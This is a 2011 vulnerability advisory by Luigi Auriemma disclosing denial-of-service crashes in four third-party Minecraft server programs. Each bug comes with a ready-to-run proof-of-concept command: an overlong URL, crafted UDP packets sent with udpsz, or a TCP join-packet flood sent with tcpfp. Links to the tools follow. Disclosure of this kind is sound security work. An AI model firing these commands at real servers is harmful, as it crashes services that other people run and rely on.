#######################################################################

                             Luigi Auriemma

Applications: various
Versions:     refer to each single case, note that they were the latest
              versions at the moment of the tests
Platforms:    Windows and possibly others
Bugs:         multiple Denial of Service vulnerabilities
Exploitation: remote, versus server
Date:         27 Jun 2011 (found and reported on my forum 22 Feb 2011)
Author:       Luigi Auriemma
              e-mail: aluigi@autistici.org
              web:    aluigi.org


#######################################################################


From http://old.zenhax.com/minecraft-day-t1769.html

Just a quick and dirty 5-minutes check I did on some third parties
server softwares available for Minecraft (http://www.minecraft.net).

The following is the list of the problems and directly the command
needed to verify each one of them:

=======================================================================

    MCServer
    http://www.mc-server.org/
    version: r172

        http://SERVER:8080/aaaaaaaaaaaa...1000_'a's...aaa
        udpsz -C 027fff -b a -T SERVER 25565 0x8002
        udpsz -C 3b -b 0x7f -T SERVER 25565 0x8002
        udpsz -C "01 00000000" -b 0x30 -T SERVER 25565 0x6072
        udpsz -C 0d -b 0x00 -T SERVER 25565 42

=======================================================================

    MCSharp
    http://crafted.voziv.com/mcsharp/
    version: 0.90

        tcpfp -m 80 -t 100 -f mcjoin.dat SERVER 25565

=======================================================================

    MineServer
    http://mineserver.be/
    version: 20110214013000

        udpsz -C "01 00000008 0001 69 0001 69 0000000000000000 00" -b 0x0f -T SERVER 25565 36

=======================================================================

    Opencraft
    http://opencraft.sourceforge.net/
    version: 0.3

        tcpfp -t 100 -f mcjoin.dat SERVER 25565

=======================================================================

All the problems are crashes (like NULL pointers and invalid memory
accesses) and CPU at 100% and so on.

Links to the tools used in the test:

    udpsz:
        http://aluigi.org/testz/udpsz.zip

    tcpfp:
        http://aluigi.org/fakep/tcpfp.zip

    mcjoin.dat: (it's just a normal and basic join packet)
        http://aluigi.org/poc/mcjoin.dat

=======================================================================